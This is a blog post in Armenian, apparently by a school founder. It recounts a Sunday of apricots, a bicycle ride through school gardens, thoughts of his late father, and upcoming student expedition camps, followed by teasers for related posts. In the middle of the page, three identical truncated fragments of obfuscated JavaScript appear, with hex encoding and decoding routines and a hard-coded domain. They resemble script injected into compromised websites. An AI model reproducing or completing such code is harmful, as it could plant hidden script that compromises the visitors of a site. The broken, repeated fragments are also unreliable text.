Ի՞նչ ասել է կիրակիի գիր` շաբաթ օրվա իմ ապրած-տեսած-զգացածի պատմությո՞ւն, թե՞ շաբաթվա ամփոփագիր՝ տպավորվածի, մտահոգությունների, չասվածի… դրանց առաջացրած պատմականի՝ ապրածի-չապրածի զուգադրումներով․․․ Ամեն ինչ ավելի պարզ է․ կիրակին այս պարգև է շաբաթվա անընդհատ ջանքերի համար, ինչպես արեգակի պտուղ ծիրանը արկղով, Աբրահամ ընկերոջից, Դավիթ Բլեյանի համար․․․ Վայելք կիրակիի ու ծով ծիրանի․․․ Հա՛մ ծիրան ենք սիրում ես ու Դավիթը, հա՛մ ծիրանի կորիզ, որ ես կոտրում եմ Դավթի համար․․․ Օրվա մեջ, ուր էլ լինեմ, ոչ մի կորիզ բաց չեմ թողնի․․․ծիրան ուտելու ոչ մի առիթ․․․Երեկ կարոտակեզ-սրտակեզ առավոտ կանուխի Խանջյան-Իսակով, պատմել եմ, ուղին շարունակություն ունեցավ․․․ Ես 8։30-ին, Հիմնական դպրոցի բակում էի. շրջանցելով գլխավոր մուտքի փակ դուռը, քնած-արթուն Համլետ բակապահին-պարտիզպանին` շրջան արեցի Շամիրամի դպրոցի ցանցը երիզող այգիներով, այնքա՜ն գործ տեսա. անհետաձգելի՞, հարցնում եմ… Ու հեծանվաուղով մտա դպրոցի պարտեզ․․․ Դպրոց-պարտեզը` մեր կրտսեր դպրոցները, իրենց նախակրթարաններով, ամենաստացվածը-ամենահանրայինը, մեր հեղինակած ուսումնական հաստատություններից, դպրոց են պարտեզի մեջ, թե պարտեզում դպրոցներ են․․․ Որքան ընկած ծիրան կար՝ կերա, որքան չջարդված կորիզ՝ հավաքեցի, պարտեզում արվածով շաբաթվա՝ ուրախացա, հաջորդ շաբաթվա անելիքը գրանցեցի ու հա՜յդե՝ իմ հայտնաբերած հեծանվակածանով՝ մեր Մետաքսի ճանապարհի Հիմնական-գյուղացիական տնտեսություն–Դպրոց-պարտեզ-Կենտրոն-Վերնիսաժ ճամփեն անցա․․․

Ընտանեկան կիրակին:
Լուսանկարները` Լուսինե Աբրահամյանի:

Հորս կապը ինձ այդպես էլ բաց չթողեց։ Ժամ ու կես հեծանվի վրա, ես իմ անվերջանալի-ամենաազնիվ կապով-մտածումով Շամխալբեկ հորս հետ էի։ Իսկական բեկ։ Մանկության ամբարից մանրաթելերով օպտիկական, ա՜յ քեզ ինտերնետ աշխարհ, ինձ մշտապես սնուցող-ուղղորդող-վստահություն հաղորդող․․․ «Մարդ, որ իրեն չխայտառակի, ուրիշը անել չի կարող»․․․ ամեն ինչ ասաց ու հայրաբար իր տեղը դրեց հայրս․ «Անցիր քո ճանապարհն ու  կենտրոնացիր քո անելիքի վրա․ ուրիշներին հանգիստ թող, շան տղա ու չնեղվես․․․ Դու ու քո ճամփան․․․»։

Հիմա, երբ իմ առաջ Սևանի «Ժայռից» սկսվող ճամբար-արշավախմբային հայրենագիտական ճամփորդությունների հայտերն են, շրջան է, հրե՛ս, շարվել են, ուսապարկերն են հավաքում Ելենա Սարգսյանն ու իր ճամփորդները, մանկավարժության ճամբարի սեբաստացի աշխատողների, Ավագ և Միջին  դպրոցների մուտքի ճամբարների ջոկատները, ռազմամարզական 2016 խաղերի հաղթողների խմբերը, սրանից էլ լավ հարթա՞կ ներկայացնելու կրթահամալիրի դպրոցների արշավախմբային-հեծանվային կայանները՝ կառուցվող-ձևավորող, որպես թվով 6-րդ հրաշալիք․․․ Թողնենք կրթահամալիրի Հիմնական դպրոցի, Դպրոց-պարտեզի, Նոր դպրոցի, Գեղարվեստի, Միջին ու Ավագ դպրոցների, Քոլեջի ճամբարներին, աշխատանքի ջոկատներին այս իմ պատումը շարունակելը, իրենց կայանները «Ժայռ 2016»-ի ամառային նախագծերի համայնապատկերին ներկայացնելը․․․ Ես այնքան ջանքեր, միջոցներ ներդրեցի, որ մեր այս ուսումնական նոր կայանները, որպես նոր տեսակի հեղինակային կրթական ծրագրով թելադրված ճամփորդությամբ ուսուցման սպասարկու այս ավարտելի վիճակի բերվեն...  Հիմա ձեր հերթն է գործելու, սկսեք. ուրիշ ե՞րբ, եթե ոչ ՝ հիմա, ուրիշ ո՞վ, եթե ոչ դուք սեբաստացիներ` մեծով-պստիկով, իրարից առաջ ընկնելով, դրանով իրար օգնելով․․․

Հիմնական դպրոցի Արտ-միջավայրի ձևավորման աշխատանքներ: 
Լուսանկարները՝ Հասմիկ Պողոսյանի:

Կիրակնօրյա ընթերցարան

Վրաստանի մասին այսպիսի կենդանի, ապրեցնող նյութեր որքան ուզեք կգտնեք. Տեսնենք ինչ է ասում մեդիան Հայաստանի մասին.

#706

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Աստծու հարվածի հետքերն եք դուք էլ…

Գևորգ հոպարը` մեր մանկավարժության լաբորատորիայի ղեկավարը, պիտի ընտրեր և ընտրեց հինգ տարեկան Դավիթ Բլեյանի նոր հեծանիվը… Ուռա՜… Տաթև քույրիկի նվիրած սիրուն հեծանիվը ծառայեց Դավթին երեք տարի անընդհատ, ա՜յ քեզ որակ…

Հրդեհ է ընկել մեր տունը, էհեյ, Դավիթ…

«Ցտեսություն» ծեսին, որ Սողոմոն Վարդանյանի համերգով մեկնարկեց Ավագ դպրոցում, միացավ և մեր ընտանիքը. Ձմեռ պապի կախարդանքի ուժի մարմնացում Գուլպան մեկնեց… Այսօր առտու 04.00, երբ ես մտա մեծ աշխարհի իմ անկյունը,

Եկանք, տեսանք․․․ Շարունակում ենք…

Աշխատանքային այցը՝ Վայոց ձոր, ինչպես միշտ, Հայաստանով մեկ՝ Շիրակ-Գյումրի, թե Աշտարակ-Արագածոտն․․․ աշխատանքային խմբով էր՝ ուսուցիչ-սովորողներ, կամավորներ՝ կրթահամալիր մուտքի ճամբարով աշխատանքի համար դիմածներ, ճամփորդական հարմարավետ միկրոավտոբուսով, հայրենագիտական-ճանաչողական շրջայցով այս անգամ Վայոց